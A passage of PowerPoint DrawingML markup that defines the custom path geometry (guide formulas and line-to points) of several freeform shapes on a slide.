                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="519"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="525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56" name="Freeform 63"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7016750" y="5294313"/>
                <a:ext cx="204788" cy="195262"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 289 w 569"/>
                  <a:gd name="T1" fmla="*/ 367 h 541"/>
                  <a:gd name="T2" fmla="*/ 331 w 569"/>
                  <a:gd name="T3" fmla="*/ 393 h 541"/>
                  <a:gd name="T4" fmla="*/ 373 w 569"/>
                  <a:gd name="T5" fmla="*/ 409 h 541"/>
                  <a:gd name="T6" fmla="*/ 410 w 569"/>
                  <a:gd name="T7" fmla="*/ 409 h 541"/>
                  <a:gd name="T8" fmla="*/ 426 w 569"/>
                  <a:gd name="T9" fmla="*/ 404 h 541"/>
                  <a:gd name="T10" fmla="*/ 436 w 569"/>
                  <a:gd name="T11" fmla="*/ 388 h 541"/>
                  <a:gd name="T12" fmla="*/ 452 w 569"/>
                  <a:gd name="T13" fmla="*/ 362 h 541"/>
                  <a:gd name="T14" fmla="*/ 447 w 569"/>
                  <a:gd name="T15" fmla="*/ 331 h 541"/>
                  <a:gd name="T16" fmla="*/ 431 w 569"/>
                  <a:gd name="T17" fmla="*/ 299 h 541"/>
                  <a:gd name="T18" fmla="*/ 478 w 569"/>
                  <a:gd name="T19" fmla="*/ 162 h 541"/>
                  <a:gd name="T20" fmla="*/ 515 w 569"/>
                  <a:gd name="T21" fmla="*/ 194 h 541"/>
                  <a:gd name="T22" fmla="*/ 557 w 569"/>
                  <a:gd name="T23" fmla="*/ 262 h 541"/>
                  <a:gd name="T24" fmla="*/ 568 w 569"/>
                  <a:gd name="T25" fmla="*/ 294 h 541"/>
                  <a:gd name="T26" fmla="*/ 557 w 569"/>
                  <a:gd name="T27" fmla="*/ 367 h 541"/>
                  <a:gd name="T28" fmla="*/ 510 w 569"/>
                  <a:gd name="T29" fmla="*/ 446 h 541"/>
                  <a:gd name="T30" fmla="*/ 488 w 569"/>
                  <a:gd name="T31" fmla="*/ 472 h 541"/>
                  <a:gd name="T32" fmla="*/ 441 w 569"/>
                  <a:gd name="T33" fmla="*/ 514 h 541"/>
                  <a:gd name="T34" fmla="*/ 415 w 569"/>
                  <a:gd name="T35" fmla="*/ 525 h 541"/>
                  <a:gd name="T36" fmla="*/ 368 w 569"/>
                  <a:gd name="T37" fmla="*/ 535 h 541"/>
                  <a:gd name="T38" fmla="*/ 321 w 569"/>
                  <a:gd name="T39" fmla="*/ 535 h 541"/>
                  <a:gd name="T40" fmla="*/ 279 w 569"/>
                  <a:gd name="T41" fmla="*/ 519 h 541"/>
                  <a:gd name="T42" fmla="*/ 231 w 569"/>
                  <a:gd name="T43" fmla="*/ 499 h 541"/>
                  <a:gd name="T44" fmla="*/ 147 w 569"/>
                  <a:gd name="T45" fmla="*/ 436 h 541"/>
                  <a:gd name="T46" fmla="*/ 64 w 569"/>
                  <a:gd name="T47" fmla="*/ 362 h 541"/>
                  <a:gd name="T48" fmla="*/ 32 w 569"/>
                  <a:gd name="T49" fmla="*/ 320 h 541"/>
                  <a:gd name="T50" fmla="*/ 11 w 569"/>
                  <a:gd name="T51" fmla="*/ 278 h 541"/>
                  <a:gd name="T52" fmla="*/ 0 w 569"/>
                  <a:gd name="T53" fmla="*/ 236 h 541"/>
                  <a:gd name="T54" fmla="*/ 0 w 569"/>
                  <a:gd name="T55" fmla="*/ 189 h 541"/>
                  <a:gd name="T56" fmla="*/ 6 w 569"/>
                  <a:gd name="T57" fmla="*/ 162 h 541"/>
                  <a:gd name="T58" fmla="*/ 37 w 569"/>
                  <a:gd name="T59" fmla="*/ 110 h 541"/>
                  <a:gd name="T60" fmla="*/ 53 w 569"/>
                  <a:gd name="T61" fmla="*/ 78 h 541"/>
                  <a:gd name="T62" fmla="*/ 116 w 569"/>
                  <a:gd name="T63" fmla="*/ 26 h 541"/>
                  <a:gd name="T64" fmla="*/ 132 w 569"/>
                  <a:gd name="T65" fmla="*/ 10 h 541"/>
                  <a:gd name="T66" fmla="*/ 216 w 569"/>
                  <a:gd name="T67" fmla="*/ 0 h 541"/>
                  <a:gd name="T68" fmla="*/ 263 w 569"/>
                  <a:gd name="T69" fmla="*/ 10 h 541"/>
                  <a:gd name="T70" fmla="*/ 305 w 569"/>
                  <a:gd name="T71" fmla="*/ 31 h 541"/>
                  <a:gd name="T72" fmla="*/ 405 w 569"/>
                  <a:gd name="T73" fmla="*/ 94 h 541"/>
                  <a:gd name="T74" fmla="*/ 258 w 569"/>
                  <a:gd name="T75" fmla="*/ 336 h 541"/>
                  <a:gd name="T76" fmla="*/ 231 w 569"/>
                  <a:gd name="T77" fmla="*/ 136 h 541"/>
                  <a:gd name="T78" fmla="*/ 211 w 569"/>
                  <a:gd name="T79" fmla="*/ 126 h 541"/>
                  <a:gd name="T80" fmla="*/ 190 w 569"/>
                  <a:gd name="T81" fmla="*/ 121 h 541"/>
                  <a:gd name="T82" fmla="*/ 158 w 569"/>
                  <a:gd name="T83" fmla="*/ 121 h 541"/>
                  <a:gd name="T84" fmla="*/ 142 w 569"/>
                  <a:gd name="T85" fmla="*/ 131 h 541"/>
                  <a:gd name="T86" fmla="*/ 127 w 569"/>
                  <a:gd name="T87" fmla="*/ 147 h 541"/>
                  <a:gd name="T88" fmla="*/ 116 w 569"/>
                  <a:gd name="T89" fmla="*/ 178 h 541"/>
                  <a:gd name="T90" fmla="*/ 116 w 569"/>
                  <a:gd name="T91" fmla="*/ 194 h 541"/>
                  <a:gd name="T92" fmla="*/ 121 w 569"/>
                  <a:gd name="T93" fmla="*/ 215 h 541"/>
                  <a:gd name="T94" fmla="*/ 142 w 569"/>
                  <a:gd name="T95" fmla="*/ 246 h 541"/>
                  <a:gd name="T96" fmla="*/ 190 w 569"/>
                  <a:gd name="T97" fmla="*/ 283 h 541"/>
                  <a:gd name="T98" fmla="*/ 279 w 569"/>
                  <a:gd name="T99" fmla="*/ 168 h 5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69" h="541">
                    <a:moveTo>
                      <a:pt x="289" y="367"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="289" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="519"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="367"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="231" y="136"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="231" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="136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57" name="Freeform 64"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7121525" y="5149850"/>
                <a:ext cx="206375" cy="190500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 226 w 574"/>
                  <a:gd name="T1" fmla="*/ 142 h 531"/>
                  <a:gd name="T2" fmla="*/ 189 w 574"/>
                  <a:gd name="T3" fmla="*/ 131 h 531"/>
                  <a:gd name="T4" fmla="*/ 158 w 574"/>
                  <a:gd name="T5" fmla="*/ 131 h 531"/>
                  <a:gd name="T6" fmla="*/ 147 w 574"/>
                  <a:gd name="T7" fmla="*/ 136 h 531"/>
                  <a:gd name="T8" fmla="*/ 132 w 574"/>
                  <a:gd name="T9" fmla="*/ 152 h 531"/>
                  <a:gd name="T10" fmla="*/ 121 w 574"/>
                  <a:gd name="T11" fmla="*/ 194 h 531"/>
                  <a:gd name="T12" fmla="*/ 121 w 574"/>
                  <a:gd name="T13" fmla="*/ 215 h 531"/>
                  <a:gd name="T14" fmla="*/ 132 w 574"/>
                  <a:gd name="T15" fmla="*/ 236 h 531"/>
                  <a:gd name="T16" fmla="*/ 179 w 574"/>
                  <a:gd name="T17" fmla="*/ 278 h 531"/>
                  <a:gd name="T18" fmla="*/ 247 w 574"/>
                  <a:gd name="T19" fmla="*/ 325 h 531"/>
                  <a:gd name="T20" fmla="*/ 320 w 574"/>
                  <a:gd name="T21" fmla="*/ 373 h 531"/>
                  <a:gd name="T22" fmla="*/ 352 w 574"/>
                  <a:gd name="T23" fmla="*/ 388 h 531"/>
                  <a:gd name="T24" fmla="*/ 378 w 574"/>
                  <a:gd name="T25" fmla="*/ 399 h 531"/>
                  <a:gd name="T26" fmla="*/ 420 w 574"/>
                  <a:gd name="T27" fmla="*/ 399 h 531"/>
                  <a:gd name="T28" fmla="*/ 436 w 574"/>
                  <a:gd name="T29" fmla="*/ 388 h 531"/>
                  <a:gd name="T30" fmla="*/ 452 w 574"/>
                  <a:gd name="T31" fmla="*/ 373 h 531"/>
                  <a:gd name="T32" fmla="*/ 463 w 574"/>
                  <a:gd name="T33" fmla="*/ 341 h 531"/>
                  <a:gd name="T34" fmla="*/ 452 w 574"/>
                  <a:gd name="T35" fmla="*/ 315 h 531"/>
                  <a:gd name="T36" fmla="*/ 441 w 574"/>
                  <a:gd name="T37" fmla="*/ 294 h 531"/>
                  <a:gd name="T38" fmla="*/ 378 w 574"/>
                  <a:gd name="T39" fmla="*/ 241 h 531"/>
                  <a:gd name="T40" fmla="*/ 457 w 574"/>
                  <a:gd name="T41" fmla="*/ 131 h 531"/>
                  <a:gd name="T42" fmla="*/ 530 w 574"/>
                  <a:gd name="T43" fmla="*/ 194 h 531"/>
                  <a:gd name="T44" fmla="*/ 567 w 574"/>
                  <a:gd name="T45" fmla="*/ 262 h 531"/>
                  <a:gd name="T46" fmla="*/ 573 w 574"/>
                  <a:gd name="T47" fmla="*/ 304 h 531"/>
                  <a:gd name="T48" fmla="*/ 552 w 574"/>
                  <a:gd name="T49" fmla="*/ 388 h 531"/>
                  <a:gd name="T50" fmla="*/ 525 w 574"/>
                  <a:gd name="T51" fmla="*/ 430 h 531"/>
                  <a:gd name="T52" fmla="*/ 463 w 574"/>
                  <a:gd name="T53" fmla="*/ 504 h 531"/>
                  <a:gd name="T54" fmla="*/ 426 w 574"/>
                  <a:gd name="T55" fmla="*/ 525 h 531"/>
                  <a:gd name="T56" fmla="*/ 383 w 574"/>
                  <a:gd name="T57" fmla="*/ 530 h 531"/>
                  <a:gd name="T58" fmla="*/ 289 w 574"/>
                  <a:gd name="T59" fmla="*/ 514 h 531"/>
                  <a:gd name="T60" fmla="*/ 231 w 574"/>
                  <a:gd name="T61" fmla="*/ 488 h 531"/>
                  <a:gd name="T62" fmla="*/ 163 w 574"/>
                  <a:gd name="T63" fmla="*/ 446 h 531"/>
                  <a:gd name="T64" fmla="*/ 52 w 574"/>
                  <a:gd name="T65" fmla="*/ 351 h 531"/>
                  <a:gd name="T66" fmla="*/ 22 w 574"/>
                  <a:gd name="T67" fmla="*/ 304 h 531"/>
                  <a:gd name="T68" fmla="*/ 5 w 574"/>
                  <a:gd name="T69" fmla="*/ 262 h 531"/>
                  <a:gd name="T70" fmla="*/ 5 w 574"/>
                  <a:gd name="T71" fmla="*/ 178 h 531"/>
                  <a:gd name="T72" fmla="*/ 22 w 574"/>
                  <a:gd name="T73" fmla="*/ 136 h 531"/>
                  <a:gd name="T74" fmla="*/ 48 w 574"/>
                  <a:gd name="T75" fmla="*/ 94 h 531"/>
                  <a:gd name="T76" fmla="*/ 111 w 574"/>
                  <a:gd name="T77" fmla="*/ 31 h 531"/>
                  <a:gd name="T78" fmla="*/ 179 w 574"/>
                  <a:gd name="T79" fmla="*/ 0 h 531"/>
                  <a:gd name="T80" fmla="*/ 216 w 574"/>
                  <a:gd name="T81" fmla="*/ 0 h 531"/>
                  <a:gd name="T82" fmla="*/ 299 w 574"/>
                  <a:gd name="T83" fmla="*/ 26 h 531"/>
                  <a:gd name="T84" fmla="*/ 263 w 574"/>
                  <a:gd name="T85" fmla="*/ 163 h 531"/>
                  <a:gd name="T86" fmla="*/ 226 w 574"/>
                  <a:gd name="T87" fmla="*/ 142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574" h="531">
                    <a:moveTo>
                      <a:pt x="226" y="142"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="226" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="136"/>
                    </a:lnTo>
